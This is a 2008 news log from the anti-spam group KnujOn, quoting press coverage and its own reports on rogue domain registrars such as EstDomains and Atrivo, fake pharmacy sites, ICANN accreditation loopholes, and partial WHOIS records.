October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 21, 2008
The FBI has served a search warrant against a 20-year-old college student in connection with the hacking of Sarah Palin’s personal e-mail account.
A witness told WBIR-TV that FBI agents served the warrant at the college residence of David Kernell, a student at the University of Tennessee-Knoxville. Kernell is the son of Mike Kernell, a Democratic state representative from Memphis.
...
The hacker who compromised Palin’s account used Ctunnel.com, an Internet proxy site, which renders Web users anonymous, to get into Palin’s e-mail. The site is run by Gabriel Ramuglia, 25, a Web developer from Athens, Ga., who said the hacker left behind revealing clues after posting screen grabs of Palin’s inbox.
(elections.foxnews.com)
Palin's Email Hacked By Anonymous (dailytech.com)
KnujOn Public Appearances
September 23rd Messaging Anti-Abuse Working Group "MAAWG" (maawg.org)
September 23-25 Open Web Application Security Project "OWASP" (owasp.org)
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 20, 2008
KnujOn will be presenting at several venues between now and November. These critical meetings will allow us to discuss our plans
in the near future:
September 22-24 Messaging Anti-Abuse Working Group "MAAWG" (maawg.org)
September 23-25 Open Web Application Security Project "OWASP" (owasp.org)
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
September 18, 2008
The Internet Corporation for Assigned Names and Numbers (ICANN) has not adequately explained to the world the need for more generic top-level domains (gTLDs - such as .com), industry representatives said last week.
As the time nears for ICANN, the internet’s technical oversight body, to publish draft guidelines (request for proposals) in the fourth quarter of 2008 for the gTLD applications, the chorus of criticism against the new domains is getting louder, with some saying it is merely a way for the global domain-name body to make money.
(ip-watch.org)
September 17, 2008
Washington Post Coverage on Nefarious Domain Name Activities
Over the last few months Brian Krebs of the Washington Post has been covering stories about domain name resellers and registrars who are in one way or another tied in to nefarious online activities such as spamming, spyware and malware. A noticeable trend in these articles is that the activity of these scammers is consistently showing them to be using registrar reseller accounts and privacy protection to cover their tracks. Krebs’ stories are worth reading as they highlight the issues in the domain name system, ICANN and registrars which continue to provide a means for these scammers to operate.
(domainnamenews.com)
Registrar Bends to Pressure from Researchers
The lesson of this story? If you believe in the quality of your work, don't let anyone try to move you off your spot.
Over a week after anti-spam research house KnujOn first called out India-based registrar Directi for allowing its business partners to support illegal online pharmacies, the registrar has sought a truce with the experts after cutting ties with the questionable domain owners.
As you may have followed via a pair of posts in this space last week and the subsequent comments filed by the involved parties, KnujOn and Directi, along with some other researchers who got into the debate, had partaken in some heated exchanges, with the registrar questioning the KnujOn report, which it initially labeled as "baseless," and KnujOn refusing to submit to the company's demands to retract its claims.
For, after questioning everything from the quality of the KnujOn conclusions to the journalistic integrity of those (ahem) who chose to cover the paper on "phantom registrars" that fail to vet their customers properly, Directi has moved to quell the issue and suspend the accounts of the illegal pharmacies that apparently have indeed been using its services.
(securitywatch.eweek.com)
Ad hoc malware police besiege net neutrality
Analysis Over the past couple of weeks, white hat netizens have scored two important victories in their tireless quest to clean up some of the internet's darkest recesses. While the events are encouraging, forgive us if we don't jump for joy.
(theregister.co.uk)
September 16, 2008
The unscrupulous distribution of addictive and dangerous prescription drugs continues to be a major problem on the internet in our country," according to Larry Golbom, host of The Prescription Addiction Radio Show. This week the topic will be to challenge the head of the Judiciary Committee, John Conyers, and our congressional leaders, in helping us stop the growing narcotic prescription internet sites. Listen to The Prescription Addiction Radio Show on WGUL 860 AM (www.860wgul.com) on Sunday night, September 21 - 9:05 p.m. Eastern.
(prescriptionaddictionradio.com)
September 15, 2008
Rather than directly assaulting banks or credit cards, phishers are now targetting online services that use credit cards:
September 14, 2008
In a rambling press release EstDomains' Konstantin Poltev professes the Registrar's innocence and tries to rally everyone in the
fight against cybercrime. How original. However, the entire premise of this release is flawed since they are still
claiming to be located in the United States when everyone knows they are not.
"
Wilmington, DE (PRWEB) September 14, 2008 -- EstDomains, Inc, a US-based domain name Registrar, officially declares opposition to malware mongers...
" (prweb.com)
If they want us to believe them, they should start be completely coming out of the shadows and tell everyone where they really are. Until we know the first level of truth, every other claim is suspect.
September 13, 2008
This year, the posts and white papers circulating on the web portray new protagonists like AbdAllah, Atrivo, Directi or EstDomains. Like their RBN senior branch, these Internet network providers are strongly suspected to protect many actors in the malware/phishing/fraud world.
In February 2008, a ShadowServer foundation document explained that many domains had moved from RBN to AIH (AbdAllah Internet Hizmetleri). Like me, many researchers saw here a revival of RBN. But as it is assumed by some French bloggers, it was only a migration from customers, from one bulletproof hoster to another.
(avertlabs.com)
September 12, 2008
The Virginia Supreme Court today struck down a state anti-spam law, saying the statute violated the First Amendment right to free and anonymous speech. The decision also tossed out the conviction of a North Carolina man once described as one of the most prolific spammers.
(washingtonpost.com)
September 11, 2008
A cyber gang known for aggressively spreading fake anti-spyware programs through hijacked and malicious Web sites has become an authorized reseller of domain names. Security Fix has learned that this gang is using its access as a registrar to ease the process of creating new Web sites used to push their invasive software.
(washingtonpost.com)
September 10, 2008
The global fight against spammy websites saw a bizarre episode unfold over the past week, involving two Internet hosting companies, an anti-spam and anti-phishing organization, and the ghost of ICANN hovering in the background. For those who missed it, KnujOn, a company whose product fights junk email, including spam and phishing, published a report alleging certain domain resellers and hosting providers were complicit with organizations using spam email to lure unsuspecting users into using illegal online pharmacies.
when it comes to situations like this one, where the governing body -- ICANN -- seems either unable or unwilling to deal with the situation, it's often the court of public opinion that reveals the extent of the problem and forces some participants to change their ways. The KnujOn-Directi-HostExploit situation only reinforces the need for more oversight of domain registration and hosting, stiff penalties that are actually enforced, and a less complicated hierarchy of accredited registrars and resellers.
(thestandard.com)
September 9, 2008
We have been asking questions about EstDomains for sometime, and now we are finally getting some answers thanks
to Brian Krebs and a number of security researchers.
The "Est" in EstDomains is a nod to the company's origins: It was founded in Tartu, the second largest city in Estonia (although the corporation is officially registered in Delaware). The chief executive of EstDomains is 27-year-old Vladimir Tsastsin.
It seems Mr. Tsastsin has a rather colorful past, and is no stranger to organized crime. According to the local court and news media, he was recently sentenced to three years in an Estonian prison after being found guilty of credit card fraud, document forgery, and money laundering.
(washingtonpost.com)
The accredidation of EstDomains should and must be terminated under ICANN's Registrar Accredidation Agreement
"
5.3 Termination of Agreement by ICANN. This Agreement may be terminated before its expiration by ICANN in any of the following circumstances:
5.3.2 Registrar:
5.3.2.1 is convicted by a court of competent jurisdiction of a felony or other serious offense related to financial activities, or is judged by a court of competent jurisdiction to have committed fraud or breach of fiduciary duty, or is the subject of a judicial determination that ICANN reasonably deems as the substantive equivalent of those offenses; or
5.3.2.2 is disciplined by the government of its domicile for conduct involving dishonesty or misuse of funds of others.
5.3.3 Any officer or director of Registrar is convicted of a felony or of a misdemeanor related to financial activities, or is judged by a court to have committed fraud or breach of fiduciary duty, or is the subject of a judicial determination that ICANN deems as the substantive equivalent of any of these; provided, such officer or director is not removed in such circumstances.
" (icann.org)
It's time for ICANN to remove the criminal registrars.
September 8, 2008
Update, Monday, Sept 8, 12:00 p.m. ET: Todd Braning, vice president of BandCon, just e-mailed me to say that BandCon also has stopped providing connectivity to Atrivo/Intercage. From his e-mail: "Intercage, a new customer, was connected to the BandCon Network for total of about a week. Once we recognized and issue with Intercage, BandCon took immediate action and terminated services. We are no longer providing services to AS27595. This can be confirmed here."
WVFiber is the only company still providing direct connectivity to Atrivo, and as stated before they plan to pull the plug by Thursday at the latest, so it appears that Atrivo will have to find another network provider or it will very soon cease to be reachable on the Internet.
All good news. Atrivo/Intercage have been a huge malware problem for a long time. This takes a good chunk of bad out of the Internet. Not a major chunk, there are many other hosts like Atrivo, but this is a step in the right direction. I'm VERY reassured to see some positive action by the responsible bandwidth providers and by nLayer who've discontinued business with a known bad entity, and in nLayer's case taken back their IP space.
We CAN make a difference, and it doesn't have to be via law enforcement action, which as we all know can be difficult to initiate in the light of how this kind of crime works across global jurisdiction.
(emergingthreats.net)
September 7, 2008
In light of recent developments, Jart Armin of HostExploit.com Bhavin Turakhia, CEO of Directi and Garth Bruen of Knujon have had an open dialogue and mutually agreed to release this joint statement clearing any previous misconceptions and reaffirming their common goal to combat abuse on the Internet. Here are few of the points they would like to jointly make -
* Directi, HostExploit, Knujon recognize and confirm that they share the common goal of continuing to combat spam and abuse on the Internet through cooperation, collaboration and proactive action. In conversation yesterday, Directi, HostExploit and Knujon agreed to publish this statement to clarify any misconceptions and affirm their mutual commitment to work closely to combat abuse.
* Directi clarified to HostExploit that, LogicBoxes (a Directi business) is not hosting any of Atrivo's websites. Atrivo runs its web infrastructure under the name of Hostfresh.com which is not affiliated with Directi in any manner.
* Directi also confirmed that ESTDomains is not a Directi company, and Directi does not control the actions or clients of ESTDomains, a fact that HostExploit was already aware of.
* HostExploit confirms that its report was not meant to allege that LogicBoxes is directly sponsoring Internet abuse, rather its report was meant, in good faith, only to provide relevant parties with all information and data which can be used to clean up websites that were violating principles of ethical behavior. HostExploit hopes that other Internet news sites which may have taken the data in the HostExploit report out of context in assuming that LogicBoxes is directly affiliated with Atrivo rectify this misconception. Directi confirms that LogicBoxes is simply a software provider to various ICANN Accredited Registrars, and its only role was providing software for domain registration and DNS management.
* HostExploit and Knujon did share with Directi a separate list of additional web sites known for badware that belong to Atrivo, enabling Directi's abuse team to swiftly suspend them. Directi HostExploit and Knujon intend to continue this information exchange to speedily resolve abuse issues, and to further demonstrate transparency the community can contact either Directi or / and HostExploit to ensure action is taken.
* Directi has clarified that privacyprotect.org is merely a privacy protection service used by many of Directi's legitimate clients, not unlike the privacy protection services offered by other Registrars. Directi further confirmed that privacy protection had already been disabled on a large percentage of Atrivo's domain names over a month ago. Since Directi offers privacy protection free of cost, there are miscreants who use it to cloak their malicious activities. However Directi reaffirmed that its abuse team will suspend privacy protection on any domain for which they receive a genuine complaint in less than 24 hours. In fact a few months ago, based on reports and data obtained from the antispam community, Directi ceased to offer its privacy protection services to all customers of ESTDomains and to tens of thousands of other domains obtained through the community. Currently over half a million genuine customers of Directi use privacy protection services to prevent their whois data from being harvested.
* Directi affirms they are in no way supporting illicit online pharmacies. KnujOn has sent a list of newly populated fake pharmacy domains that Directi suspended. Directi and KnujOn now jointly call on the Internet community, private industry, and government to help develop policy and methods to put a stop to the fake pharmacy menace since Registrars cannot do this alone.
* Knujon acknowledges that the 48 Registrars that it thought were phantom are actually in existence as Delaware incorporated legitimate companies with a valid ICANN Accreditation and accurate contact information. Knujon's confusion stemmed from the fact that ICANN does not require these companies to publically report their incorporation details.
* Directi and HostExploit have discussed further ways to enhance their cooperative collaboration to clamp down spam and other forms of abuse on the Internet as rapidly as possible. Directi acknowledges and applauds HostExploit continuous efforts in tracking down miscreants. HostExploit confirms that they are pleased to work directly with the Directi abuse desk in helping Directi identify any miscreants that maybe using Directi's services. The partnership includes sharing investigative processes and intelligence data on an ongoing basis.
Together with the community we hope to continue taking steps to make the Internet a better and safer place.
September 6, 2008
As early as November 2007, Armin and I (McQuaid) had corresponded regarding the presence of former customers of the Russian Business Network ISP operating in Atrivo IP space. Over the next several months, as a part of our normal malware investigations, we noted the disproportionate amount of malware within Atrivo. During this time, I was publishing a list of RBN IPs at Matt Jonkman's emergingthreats.net, and also a blackhole DNS file for Smoothwall. To that end, in March 2008 I completed a survey of all class C networks within Atrivo and incorporated those domains into the Smoothwall blackhole DNS file. I also added all of Atrivo's IP space to the blacklist of RBN IP addresses.
(securehomenetwork.blogspot.com)
September 5, 2008
A different angle on SPAM and malware
Two websites have recently published reports on Internet security and the spread of malware across the web, and both documents examine the problem from a new perspective. Most online security coverage tends to focus on the perpetual war between the antimalware industry and the companies that earn an illicit living from selling botnets and developing new exploits. The reports from HostExploit and Knujon, however, focus on the registrars and ISPs that actually provide hosting to the black hats, and explore the various connections between the organizations.
(arstechnica.com)
Spammers Find a Friend (dailytech.com)
Where is the promised Comprehensive Review of ICANN Accreditation Processes? (icann.org)
More fallout on the suspended malware sites (msmvps.com)
Spam at the Highest Levels (silobreaker.com)
Scammer-Heavy U.S. ISP Grows More Isolated
Last week, Security Fix published an analysis of Atrivo, a California based Internet service provider, also known as Intercage, that has proven to be a virtual magnet for cyber-criminal operations. Since that time, Atrivo's biggest network backbone provider decided it could no longer support the company, and stopped offering it direct connectivity. (washingtonpost.com)
September 4, 2008
Directi has vigorously responded to KnujOn's report, rejecting many of the claims in it. Directi has
provided us with some commentary and we will discuss it in the context of our report.
EstDomains
Directi is now
severing ties with Estdomains amid complaints that the Eastern European company makes it too easy
to register sites that are used by spammers and scammers.
"Just the reputation loss and the confusion because of these linkups has been more detrimental to us than the commercial gain from that one-off sale," said Directi CEO Bhavin Turakhia. "We felt it was the right move morally."
The link with EstDomains was one of our biggest concerns, and we have to applaud Directi for taking this step.
EstDomains has not
responded to requests to disclose their real location in Eastern Europe.
Turakhia says he looks forward to the day when he can completely sever ties with Estdomains.
"I would really love to detach ourselves from that organization," he said. Awesome.
Phantom Registrars
In investigating the 48 Directi-owned Registrars with questionable locations, we reported facts. The address used
by many of these Registrars: "14525 SW Millikan Way Beaverton, OR 97005-2343" is the address of a
mail forwarding service called Earthclassmail. According
to Directi, the listed companies are registered in Delaware, but not in Oregon or New York as listed in the
ICANN Directory. Directi is headquartered in Mumbai, India. KnujOn feels
that any company given so much responsibility over the Internet should fully disclose where they are located, but this
is apparently not an ICANN requirement.
Indeed, Stacy Burnette, director of contractual compliance at ICANN, said the organization is satisfied the
registrars are incorporated in the location listed in their application. Telephone numbers in the contact information
need not correspond to the location of incorporation, she said. ICANN doesn't require registrars to publicly disclose
their place of incorporation.
To which KnujOn says: Huh? So, as the expression goes, don't hate the player hate the game. Directi merely acquired these
accreditations by ICANN's own rules. Summary: One address in the application, a second address disclosed to the public.
Read this line again:
"ICANN doesn't require registrars to publicly disclose their place of incorporation." How does this figure into
ICANN's mission to be an
open and transparent organization? "Telephone numbers in the contact information
need not correspond to the location of incorporation". How can there be any accountability? This
situation is upside-down. Registrants are required to list their valid contact information, but
the Registrars who sponsor their domains are not.
PrivacyProtect.org
Directi has informed us they no longer use PrivacyProtect. This is encouraging news, and we applaud them.
Un-suspended Domains
Directi says that a technical error caused some fake pharmacies to reappear. We'll have to take their
word on it.
Illicit Sites
Most importantly, Directi has accepted KnujOn's challenge to dump illicit sites and become an example in the industry. We have offered
them our assistance in this endeavor.
September 3, 2008
Two recently issued reports portray the Internet Corporation for Assigned Names and Numbers (ICANN) as a bureaucracy that enables cyber criminals.
In one report (PDF), researchers Jart Armin, James McQuaid and Matt Jonkman detail how a one of ICANN's prized sponsors has ties to one of the net's more prolific sources of malware and illegal online pharmacies. It's called LogicBoxes, and over the past two years, ICANN has listed it as a sponsor for meetings that took place in Los Angeles and Delhi, India.
(theregister.co.uk)
"Phantom Registrar" Problem Predicted in 2007
"
There are times when loopholes seem to be the only source of true
innovation in the DNS – it was a loophole in the RAA that allowed for the
marketing of proxy registration services; it was loopholes in the
accreditation process that allowed for the creation of “phantom
registrars” that only exist as a device to gain access to the deleted
names pool...Loopholes can become the bane of our community… and they are not
easy to spot."
(losangeles2007.icann.org)
...oops, predicted in 2006
"Most of the affected doamins seem to be registered by cyberwarehousing operation Ovidio Limited. Ovidio Limited has been registering thousands of generic keywords as .eu domains since the landrush in April. It also has a Cyprus address in the WHOIS data for all .eu domains checked. Even Ovidio's own .eu domain (ovidio.eu) is on hold. Perhaps EURid has been shamed into doing something about the bogus registrar problem?
...
The magnitude of EURid’s decision to sue 400 phantom registrars for breach of contract is only just becoming apparent... other phantom registrars still exist and action has not been taken against them yet."
(webmasterworld.com)
...oops, predicted in 2004
"You might not recognize the name Jennifer Ross-Carriere, but Jennifer is listed as the contact for (98) ninety-eight newly accredited ICANN registrars. http://www.icann.org/registrars/accreditation-qualified-list.html
Each one of these "accredited registrars" seems to have a website that forwards to namescout.com (although truthfully I didn't inspect all 98) All this just for the purpose of commandeering the batch pool?
Just my view, but I think this fully qualifies as gaming the system."
(does-not-exist.org)
September 2, 2008
The issues of Phantom Registrars and Registrar Criminality have become a source of outrage at ICANN's
At-Large Committee.
"We cannot allow ICANN to get off the hook so easily. We cannot put through yet another tame comment while consumer protections are falling by the wayside with increased regularity.
...
Who anywhere would stand for accreditations being provided to non-existent companies and shell corporations?
...
ICANN has long been captured by the registries and registrars that exclusively feed its coffers. Whatever they want, they get and the public usually gets screwed.
...
The spam mitigation firm Knujon pointed to the nefarious activities of a single registrar associated with illicit pharmaceuticals that has sponsored 48 phantom accreditations. Extending accreditations to these shell/paper companies that are formed for the express purpose of gaming the system must stop. These phantom registrars are currently being used to game the aftermarket...This is simply not acceptable.
...
As a community, we are aware of accredited registrars in North America with officers that have been convicted of mail fraud, that continue to be associated with the deceptive marketing practices employed by the notorious Domain Registry of America. We are not happy about this.
...
We are aware of registrars that now stand as defendents in courts of law accused of cybersquatting, and yet ICANN lacks the will to suspend their accreditations." (atlarge.icann.org)
A request has been made of ICANN's Tim Cole to explain this situation.
September 1, 2008
In KnujOn's report Phantom Registrars, Fake Pharmacies, and the Secret Infrastructure we detail
issues with EstDomains.
The Washington Post has covered more issues on EstDomains in connection to Atrivo. EstDomains now claims
to be trying to clean up their act, but there are three issues that need to be addressed before we can take
them seriously. We have made these challenges here and within
the comments section of the Washington Post story:
- EstDomains needs to drop usage of
PrivacyProtect.org. They claim they already have but we will monitor to make sure.
- Disclose EstDomains Real Location
According to EstDomains and Internic, they are located in Delaware. We know this is not true. We know they are located outside of the
United States and want them to do the right thing and disclose their real location to the public.
- Address Steroid Site Complaint from July
Two months ago LegitScript and KnujOn sent a
letter to EstDomains requesting
they terminate an unlicensed steroid site being sponsored at EstDomains. EstDomains never responded and the site is
sill active. EstDomains now claims they never got the letter (could have something do with the issue above), even though we also
sent it to all of their contact emails.
EstDomains Sponsored fitnesspharmaas.com
August 31, 2008
KnujOn will
be discussed tonight, along with other topics, on Larry Golbom's radio program
Prescription Addiction Radio at 9PM EST. Those in
the Florida area can listen on 860 AM WGUL. Listeners elsewhere may
may stream over the Internet here,
here, or
here.
The Prescription Addiction Radio Show is dedicated to the thousands of families who are being or have been affected by the misuse of prescription drugs. The Prescription Addiction Radio Show is here to explore some of the challenges we face in trying to turn the explosion in the misuse of prescription drugs around.
(http://860wgul.townhall.com)
August 30, 2008
The Brian Kreb's posting,
Report Slams U.S. Host as Major Source of Badware, about hostexploit's report
on Atrivo and their apparent connection
to a rogues gallery of cybercrooks. This article has generated considerable
backlash from Atrivo, Hostfresh, Intercage, and EstDomains. These groups have posted many, many comments to
to the Washington Post article slamming the slam report. However, the results have been verified by other groups like SpamHaus:
Without exception, all of the major security organizations on the Internet agree that the 'Home' of cybercrime in the western world is a place known as Atrivo/Intercage. We ourselves have not come to this conclusion lightly but from many years of dealing with criminal operations hosted by Atrivo/Intercage, gangs of cybercriminals - mostly Russian and East European but with several US online crime gangs as well - whose activities always lead back to servers run by Atrivo/Intercage. We have lost count of the times we have tracked a major virus botnet's "command and control" to Atrivo/Intercage servers, readers can view here some of the current and historic SBL records for Atrivo for a taste of what has been happening in this network. At almost every Internet security conference, or law enforcement seminar on cyber-crime, a presentation will detail some attack, exploit, phish or financial crime that has some nexus at Atrivo/Intercage.
(spamhaus.org)
August 29, 2008
Knujon coordinated with HostExploit.com to develop a parallel report to the one
exposing
ATRIVO and their connection to the Directi Group. A summary of the report,
ATRIVO – CYBER CRIME USA
is below:
In a new study entitled "Atrivo - Cyber Crime USA", the authors have
extensively tracked and documented ongoing cyber criminal activity
from within the Internet servers controlled by the California-based
Atrivo, and other associated entities. Atrivo is one of the Internet's
Autonomous Systems and controls a large number of IP addresses, which
web sites must use to reach consumers.
Produced by cyber crime researcher Jart Armin, in association with
Matt Jonkman and James McQuaid, the first of its kind Open Source
Security study set out to quantify and continuously track cyber crime
using numerous methods of measurement. It focuses specifically on the
notorious Atrivo, which has been seen by many over several years as a
main conduit for financial scams, identity theft, spam and malware.
This study although fully self contained is the first of a series of
reports, on a monthly basis there will be a follow up to report on the
community response, the efforts of the cyber criminals to evade
exposure, listings to assist in blocking the risks to Internet users,
and hopefully efforts to stop them.
In addition to original quantitative research conducted by Armin,
Jonkman and McQuaid, the study draws upon the findings of other
research efforts, including StopBadware, EmergingThreats, Knujon,
Sunbelt, CastleCops, Spamhaus, and many others. What emerges is a
picture of a front for ruthless cyber criminals, who have specifically
targeted consumers in the United States and elsewhere. The study
provides hard data regarding specific current activity within Atrivo,
explains how consumers are targeted, describes Atrivo's virtual
network structure, organizational modeling, and cites Atrivo's
collusive failure to respond to abuse complaints from 2004 to the
present. The study includes three dimensional charts, diagrams, and a
YouTube video which make it easy to grasp the statistics or processes
discussed.
Get the report here: Atrivo - Cyber Crime USA
Additional details are available at stopbadware.org:
Jart Armin, StopBadware.org community volunteer and intrepid security researcher, released a report today that concludes that Intercage and Atrivo, a California-based family of companies that operate web hosting, domain registration, and other online services, are a hub of badware activity:
Atrivo is a major hub of cyber crime based within the USA, and has been known as such within the Internet
community for many years. Within this study we provide detailed evidence not only for public and community
awareness but also to provide evidence for action.
Atrivo’s reach in the cyber crime community and the Internet as a whole runs deep. From their partners in crime, to
the domain registration and hosting services it has to be remembered this is deliberately misleading to avoid
detection.
Some of the companies included in the report have built a reputation in the security community as being havens for this type of activity, and Jart’s extensive research raises questions about the degree to which these companies are aware of, and turn a blind eye to, badware activity on their systems.
...and from the Washington post:
Report Slams U.S. Host as Major Source of Badware:
Several noted security researchers are releasing a report today that stems from many months of investigating malicious activity emanating from Atrivo's customers. Security experts say that Atrivo, also known as "Intercage," has long been a major source of spyware, adware, viruses and fake anti-virus products.
The report is an exhaustive and well-researched analysis of Atrivo and its operations. Some of the statistics on active exploits cited in that report come from data sets I commissioned during my own investigation of Atrivo and later shared with Jart Armin, the principal author of the report and curator of the blog hostexploit.com.
Looking back several years, Atrivo's various networks were used heavily by the Russian Business Network, an ISP formerly based in St. Petersburg, Russia. RBN had gained notoriety for providing Web hosting services catering exclusively to cyber criminals. But after increased media attention, RBN dispersed its operations to other, less conspicuous corners of the Internet.
(voices.washingtonpost.com/securityfix/)
August 28, 2008
In examining what is driving and enabling Internet criminality KnujOn has taken a
critical look at the Registrar community. Some have wondered why, noting that a Registrar simply
holds domains names and resolves them to IP addresses. But that is the simple point. Registrars
have been given an enormous public trust. KnujOn has noted serious flaws in the system that is supposed to
monitor Registrar compliance and the failure of the industry to police itself. KnujOn has noted
Registrars refusing to terminate illicit domains
even after receiving detailed information about the illegal nature of these sites.
Even more telling we have two recent cases of Registrars being directly involved in fraud, spamming and other
questionable activities.
In 2002 Peter Kuryliw pleaded guilty
to fraud in a Canadian court and was fined $30,000 for targeting over 40,000 business
with fake invoices. Mr. Kuryliw was granted accreditation for an Internet Registration business by ICANN (namejuice.com)
and may have part ownership in several other Internet companies. And it continues,
in 2003 a court ordered a Kuryliw-affiliated
Registrar to stop using deceptive emails. Namejuice.com is still operating.
Example two.
Scott Richter paid $7 million to Microsoft in 2006 in a settlement arising out of a lawsuit alleging
illegal spam activities. He also settled another spam case with New York Attorney General for $50,000 in 2004.
In 2008 MySpace was awarded $ 4.8 million in damages and $ 1.2 million in attorney's fees in a
judgment against Richter’s company for sending spam to MySpace members through compromised MySpace accounts.
Scott Richter owns Registrar Dynamic Dolphin, which until recently was the largest user of the
PrivacyProtect.org service.
Registrars will often refer spam victims to the "upstream ISP" or website operators to file abuse complaints.
However, when the content is hosted on zombie botnets and the owners are anonymously hidden by
PrivacyProtect.org,
there is no one else to direct a complaint to but the Registrar. And it is the Registrar who has ultimate control
over terminating a domain.
EstDomains
EstDomains is a Registrar that also makes heavy use of the PrivacyProtect.org service for
masking the ownership of fake pharmacy domains. EstDomains is incorporated in Delaware.
For those not familiar with U.S. geography, Delaware is a tiny state that earns its keep by being very
business-friendly. Typically, any business incorporated in Delaware is not actually there. This means there are
scant details publicly available for who owns EstDomains.
EstDomains Sponsored fastcanadianpharmacy.com
It is also important to note that this site claims it is "FDA Approved" and "Trusted by VeriSign." The depth of
misrepresentation at these sites is profound and seems to exist with absolute impunity.
So, we have an ICANN Registrar with undisclosed
ownership who sponsors unlicensed Internet pharmacy domains (advertised with spam from zombie botnets) with anonymous ownership
through an anonymously owned privacy registration service. How is the consumer being protected?
Drugs, Pornography, and Malware
Using pornography to lure unsuspecting Internet users into unknowingly downloading malware is an old trick, but one that
continues to work. However, KnujOn has found an array of EstDomains sponsored, PrivacyProtect.org shielded domains that combine
drugs, porn and malware. Several former steroids EstDomains sites have metadata that appears to offer Schedule 3 substances like
Morphine, Testosterone, and Vicodin but redirects the user's browser to youtube-free-videos.com (also sponsored
by EstDomains), a porn site that attempts download malware in the guise of a "player update." The scripting vigorously
prevents the user from navigating away from the page or closing it. The content of
youtube-free-videos.com is served from best-of-searcht.com (also sponsored by EstDomains), another porn site that
has links to another fake pharmacy: world-pharmacy-online.com (also sponsored by EstDomains).
This EstDomains sponsored and PrivacyProtected domain asiangirlporn.net rotates different sites the user is redirected to. One
site, movlabs.com, seems to feature films that depict rape scenes as well as attempting to download malware from aviupdate.com (also sponsored
by EstDomains).
EstDomains Sponsored movlabs.com
Another redirect landing launched from asiangirlporn.net links to fake virus/spyware scan site: security-scan-pc.com. This particular
fake security software is actually one of the most insidious PC infections to date. It blocks access to the Control Panel,
Registry Editor, hard drive, removable media, Task Manager, Run, and just about any utility someone might use to fix their PC or remove the malware.
It also blocks installation and running of legitimate anti-virus packages. Once infected your PC can only be used as a botnet node or
a doorstop.
security-scan-pc.com
It is unclear whether this simply an attempt to expand the botnets or a trap for anyone trying to investigate these sites.
August 21, 2008
SHANGHAI - Jason Yao lives a dangerous life for a guy in the golf business.
He gets death threats. He raids factories and markets. He shakes down informants and hangs out with private investigators. He has 10 aliases.
China is the focus of the worldwide war against counterfeit golf products, and Yao is on the front lines. His employer, Acushnet, located 7,000 miles away in Fairhaven, Mass., makes the world's most popular - and most copied - golf ball, the Titleist Pro V1, along with clubs, accessories, and shoes that counterfeiters mimic for sales around the globe.
(boston.com)
August 20, 2008
WASHINGTON - (AP) A hacker broke into a Homeland Security Department telephone system over the weekend and racked up about $12,000 in calls to the Middle East and Asia.
The hacker made more than 400 calls on a Federal Emergency Management Agency voicemail system in Emmitsburg, Md., on Saturday and Sunday, according to FEMA spokesman Tom Olshanski.
FEMA is part of Homeland Security, which in 2003 put out a warning about this very vulnerability.
(news.yahoo.com)
August 19, 2008
Several major online threats—spam, spyware, and virus infections—have declined significantly over the past few years, our new State of the Net survey has found.
But online threats are still of great concern, according to our research and national survey of 2,071 online households conducted this past spring by the Consumer Reports National Research Center.
(consumerreports.org)
ID leaks: A surprising source is your government at work(consumerreports.org)
Insidious new threats(consumerreports.org)
7 online blunders: These common mistakes can ruin your computer or invite identity theft(consumerreports.org)
Cyber Insecurity Guide(consumerreports.org)
August 18, 2008
If one were to look at the Internic directory it would appear that there are 529 ICANN accredited registrars
in the United States. Having this many different companies would give the appearance that there is diversity
and competition in the domain marketplace. However, you would be wrong. Four companies control 318 accreditations:
eNom (116), Directi/PDR (47), Dotster (51), and Snapnames (104). Another 122 accreditations are owned by only 23 companies.
What is left are 136 registrars that appear independent. So, that would make 163 the realistic count not 529. Considering this data
the U.S. Registrar industry looks less like a an open and competitive market and more like a cartel.
Full report
August 17, 2008
Once again we have recorded a case where a registrar is not returning full Whois records in
follow up reports to ICANN. These follow up reports are supposed to contain the current
owner information instead Xin Net is returning no data. This seems to be a pattern at some providers and particularly for
illicit sites. The domains below include garden variety fake pharmacies, knockoff products sites,
and one site selling "marijuana substitutes."
| Report from Registrar to ICANN | | Current Content |
|---|
| |
|
WHOIS DATA AS OF 2008/08/06 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: VNSOEVJSOE.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.NS-EARTHLING.COM
Name Server: NS2.NS-EARTHLING.COM
Status: ok
Updated Date: 07-feb-2008
Creation Date: 07-feb-2008
Expiration Date: 07-feb-2009
| |
|
WHOIS DATA AS OF 2008/07/11 01:15:01
REGISTRAR WHOIS:
Whois Server Version 2.0
Domain Name: THEBUDSHOP.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.THEBUDSHOP.NET
Name Server: NS2.THEBUDSHOP.NET
Status: ok
Updated Date: 19-jun-2008
Creation Date: 30-oct-2007
Expiration Date: 30-oct-2008
| |
|
WHOIS DATA AS OF 2008/07/01 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
Domain Name: RELIABLESUPERBLY.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: S1.PWRDNSONE.BIZ
Name Server: S1.PWRDNSTWO.BIZ
Name Server: S2.PWRDNSONE.BIZ
Name Server: S2.PWRDNSTWO.BIZ
Status: ok
Updated Date: 25-may-2008
Creation Date: 20-jan-2008
Expiration Date: 20-jan-2009
| |
|
REGISTRAR WHOIS:
Whois Server Version 2.0
Domain Name: LEASIDEHOME.COM
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.BARGAINPILLSPHARMACY.COM
Name Server: NS2.BARGAINPILLSPHARMACY.COM
Status: ok
Updated Date: 11-mar-2008
Creation Date: 10-mar-2008
Expiration Date: 10-mar-2009
| |
|
WHOIS DATA AS OF 2008/08/06 01:15:01
REGISTRAR WHOIS:
REGISTRY WHOIS:
Whois Server Version 2.0
